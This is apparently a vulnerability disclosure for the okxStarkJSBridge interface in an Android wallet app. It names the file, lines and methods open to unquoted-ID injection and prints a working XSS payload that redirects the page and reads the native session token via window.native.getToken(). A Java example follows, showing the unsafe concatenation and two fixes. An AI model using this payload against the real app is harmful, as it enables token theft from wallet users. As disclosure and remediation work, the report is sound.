Vulnerability Details
Interface: okxStarkJSBridge (okxInternalJSBridge)
Vulnerable File: sources/p270o/cfy.java
Vulnerable Lines: 32, 60
Vulnerable Methods: requestAccounts, disconnect, connectWallets, signMessage
Vulnerable Pattern: UNQUOTED ID injection
XSS Payload
Payload: 1);setTimeout(()=>{window.location='https://www.okx.com'},500);setTimeout(()=>{alert(window.native.getToken())},1000);//
Explanation: Redirects the page to https://www.okx.com after 500 ms, then executes alert(window.native.getToken()) after 1000 ms.
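
The unquoted-ID pattern named above, next to two ways of closing it, as an added example that is not the code from sources/p270o/cfy.java. The handler name window.exampleBridge.onResponse, the class and method names, and the sample ids are assumptions made for illustration.

```java
import java.util.regex.Pattern;

public final class BridgeCallbackDemo {
    // Hypothetical page-side handler; the report does not show the real callback name.
    private static final String HANDLER = "window.exampleBridge.onResponse";
    private static final Pattern DECIMAL_ID = Pattern.compile("[0-9]{1,15}");

    // The pattern the report names: the page-supplied id is concatenated unquoted.
    static String buildUnquoted(String id, boolean ok) {
        return HANDLER + "(" + id + "," + ok + ");";
    }

    // Fix 1: accept only a decimal integer and re-emit the parsed number.
    static String buildNumeric(String id, boolean ok) {
        if (id == null || !DECIMAL_ID.matcher(id).matches()) {
            throw new IllegalArgumentException("request id is not a decimal integer");
        }
        return HANDLER + "(" + Long.parseLong(id) + "," + ok + ");";
    }

    // Fix 2: for ids that may be strings, emit a JS string literal in which every
    // character outside a small safe set is written as a four-digit hex escape.
    static String buildQuoted(String id, boolean ok) {
        if (id == null) throw new IllegalArgumentException("request id is missing");
        StringBuilder sb = new StringBuilder(HANDLER).append("(\"");
        for (char c : id.toCharArray()) {
            boolean safe = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9') || c == '-' || c == '_';
            if (safe) sb.append(c);
            else sb.append(String.format("\\u%04x", (int) c));
        }
        return sb.append("\",").append(ok).append(");").toString();
    }

    public static void main(String[] args) {
        String[] ids = {"42", "1);probe();//"}; // constructed sample ids
        for (String id : ids) {
            System.out.println("unquoted: " + buildUnquoted(id, true));
            System.out.println("quoted:   " + buildQuoted(id, true));
            try {
                System.out.println("numeric:  " + buildNumeric(id, true));
            } catch (IllegalArgumentException e) {
                System.out.println("numeric:  rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

For the second sample id, the unquoted builder's output contains an extra statement after the handler call, the quoted builder keeps the whole id inside one string literal, and the numeric builder rejects it.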